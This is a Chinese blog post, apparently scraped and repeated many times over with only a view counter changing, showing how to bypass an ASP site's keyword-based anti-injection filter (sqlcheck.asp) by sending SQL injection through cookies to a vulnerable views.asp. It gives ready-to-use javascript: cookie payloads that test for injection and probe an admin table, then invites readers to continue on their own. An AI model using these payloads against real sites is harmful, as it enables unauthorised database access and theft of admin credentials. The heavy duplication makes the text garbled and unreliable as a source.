If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43086) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43085) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43084) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43083) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43082) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43081) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43080) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43079) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43078) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43077) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43076) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43075) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43074) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43073) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43072) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
